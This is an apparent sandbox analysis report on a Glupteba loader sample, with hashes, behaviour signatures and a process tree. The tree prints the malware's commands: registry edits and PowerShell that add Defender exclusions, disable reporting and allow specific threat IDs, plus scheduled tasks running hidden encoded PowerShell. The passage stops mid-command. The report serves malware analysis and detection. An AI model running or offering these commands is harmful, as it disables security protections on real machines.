Analysis

  • max time kernel
    152s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231020-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-11-2023 17:13

General

  • Target

    NEAS.7e2fc238252c47231d37ab938055672b07423ce2688bb32cff3b97dc179fee9b.exe

  • Size

    11.6MB

  • MD5

    ba200438ff24d871a56dff7a2df554eb

  • SHA1

    61ed0d05ccc16607e5f26eaf487f1a97a17ae179

  • SHA256

    7e2fc238252c47231d37ab938055672b07423ce2688bb32cff3b97dc179fee9b

  • SHA512

    a095a2e012c7a947fc76e754ae6dc23e41114dac129f332a3fb8457f602d905470018df2e755103666d9d9fe4383bdefa64e8802a8798103a99890db31392f86

  • SSDEEP

    98304:DAbxta1VhHg2ZWlJzbTKbq99/fKG1nEB/bE7ccv+1111mTPeiv0xxx++BYzlfj8L:DAbxtaDhHg2Zzbq99/yyn77RMC1Qv5

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 5 IoCs
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 29 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NEAS.7e2fc238252c47231d37ab938055672b07423ce2688bb32cff3b97dc179fee9b.exe
    "C:\Users\Admin\AppData\Local\Temp\NEAS.7e2fc238252c47231d37ab938055672b07423ce2688bb32cff3b97dc179fee9b.exe"
    1⤵
    • UAC bypass
    • Windows security bypass
    • Checks computer location settings
    • Windows security modification
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:4620
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\NEAS.7e2fc238252c47231d37ab938055672b07423ce2688bb32cff3b97dc179fee9b.exe" -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:976
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
      2⤵
      • Drops startup file
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:560
      • C:\Users\Admin\Pictures\g0x1EVMlW2GUhoWxorqG9R3T.exe
        "C:\Users\Admin\Pictures\g0x1EVMlW2GUhoWxorqG9R3T.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:2532
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\g0x1EVMlW2GUhoWxorqG9R3T.exe" & del "C:\ProgramData\*.dll"" & exit
          4⤵
            PID:4404
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 5
              5⤵
              • Delays execution with timeout.exe
              PID:712
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 2104
            4⤵
            • Program crash
            PID:3440
        • C:\Users\Admin\Pictures\czNIfVxnlGU4Hrgs7jgg0qib.exe
          "C:\Users\Admin\Pictures\czNIfVxnlGU4Hrgs7jgg0qib.exe"
          3⤵
          • Executes dropped EXE
          PID:320
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 320 -s 280
            4⤵
            • Program crash
            PID:2400
        • C:\Users\Admin\Pictures\z507sXUZGulpJ1KbJKRPHlDK.exe
          "C:\Users\Admin\Pictures\z507sXUZGulpJ1KbJKRPHlDK.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1884
          • C:\Users\Admin\Pictures\z507sXUZGulpJ1KbJKRPHlDK.exe
            "C:\Users\Admin\Pictures\z507sXUZGulpJ1KbJKRPHlDK.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            PID:4836
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /im "z507sXUZGulpJ1KbJKRPHlDK.exe" /f & erase "C:\Users\Admin\Pictures\z507sXUZGulpJ1KbJKRPHlDK.exe" & exit
              5⤵
                PID:3728
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im "z507sXUZGulpJ1KbJKRPHlDK.exe" /f
                  6⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2100
          • C:\Users\Admin\Pictures\GXxEjRQ5BDrUWrCgQMitFusb.exe
            "C:\Users\Admin\Pictures\GXxEjRQ5BDrUWrCgQMitFusb.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2472
            • C:\Users\Admin\AppData\Local\Temp\7zS29CA.tmp\Install.exe
              .\Install.exe
              4⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4548
              • C:\Users\Admin\AppData\Local\Temp\7zS30CF.tmp\Install.exe
                .\Install.exe /oHtdidxARZ "385118" /S
                5⤵
                • Checks BIOS information in registry
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in System32 directory
                • Enumerates system info in registry
                • Suspicious use of WriteProcessMemory
                PID:3428
                • C:\Windows\SysWOW64\forfiles.exe
                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:64
                  • C:\Windows\SysWOW64\cmd.exe
                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2624
                    • \??\c:\windows\SysWOW64\reg.exe
                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                      8⤵
                        PID:2400
                      • \??\c:\windows\SysWOW64\reg.exe
                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                        8⤵
                          PID:4880
                    • C:\Windows\SysWOW64\forfiles.exe
                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2244
                      • C:\Windows\SysWOW64\cmd.exe
                        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                        7⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3048
                        • \??\c:\windows\SysWOW64\reg.exe
                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                          8⤵
                            PID:4068
                          • \??\c:\windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                            8⤵
                              PID:3856
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /CREATE /TN "gTMzeftsM" /SC once /ST 16:23:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                          6⤵
                          • Creates scheduled task(s)
                          PID:4304
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /run /I /tn "gTMzeftsM"
                          6⤵
                            PID:3232
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /DELETE /F /TN "gTMzeftsM"
                            6⤵
                              PID:4644
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /CREATE /TN "bwrELlnqjSCVVAtkbD" /SC once /ST 17:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LvGDzkYwvMWaEHuqL\ATFxryqRcteWZjE\BOEiHEY.exe\" 8M /tksite_idSMN 385118 /S" /V1 /F
                              6⤵
                              • Drops file in Windows directory
                              • Creates scheduled task(s)
                              PID:2180
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                    1⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2080
                    • C:\Windows\system32\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      2⤵
                        PID:4560
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 320 -ip 320
                      1⤵
                        PID:3884
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                        1⤵
                          PID:800
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                          1⤵
                            PID:1380
                          • C:\Windows\system32\gpscript.exe
                            gpscript.exe /RefreshSystemParam
                            1⤵
                              PID:3224
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2532 -ip 2532
                              1⤵
                                PID:1488
                              • C:\Users\Admin\AppData\Local\Temp\LvGDzkYwvMWaEHuqL\ATFxryqRcteWZjE\BOEiHEY.exe
                                C:\Users\Admin\AppData\Local\Temp\LvGDzkYwvMWaEHuqL\ATFxryqRcteWZjE\BOEiHEY.exe 8M /tksite_idSMN 385118 /S
                                1⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                PID:4344
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                  2⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4008
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:2708
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                        4⤵
                                          PID:1092
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                          PID:3560
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                          3⤵
                                            PID:4248
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                            3⤵
                                              PID:3488
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                                PID:1520
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                  PID:1964
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                  3⤵
                                                    PID:2712
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                      PID:3908
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                      3⤵
                                                        PID:1180
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                          PID:4196
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                            PID:64
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                            3⤵
                                                              PID:4636
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                                PID:4420
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                  PID:2080
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                    PID:1544
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                    3⤵
                                                                      PID:4536
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                      3⤵
                                                                        PID:2804
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                        3⤵
                                                                          PID:4292
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                          3⤵
                                                                            PID:2180
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:3372
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                                PID:1588
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                3⤵
                                                                                  PID:996
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                  3⤵
                                                                                    PID:3888
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                    3⤵
                                                                                      PID:3516
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                      3⤵
                                                                                        PID:4264
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                        3⤵
                                                                                          PID:4856
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                          3⤵
                                                                                            PID:1360
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                            3⤵
                                                                                              PID:4212
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OEzFEJJUXGhhC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OEzFEJJUXGhhC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jDuHzkIsBvCU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jDuHzkIsBvCU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rkowPKVfGlUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rkowPKVfGlUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vCSdqahflWztnyCJPDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vCSdqahflWztnyCJPDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zIOXOzNnU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zIOXOzNnU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BCsIBCZjkJGSaeVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BCsIBCZjkJGSaeVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD 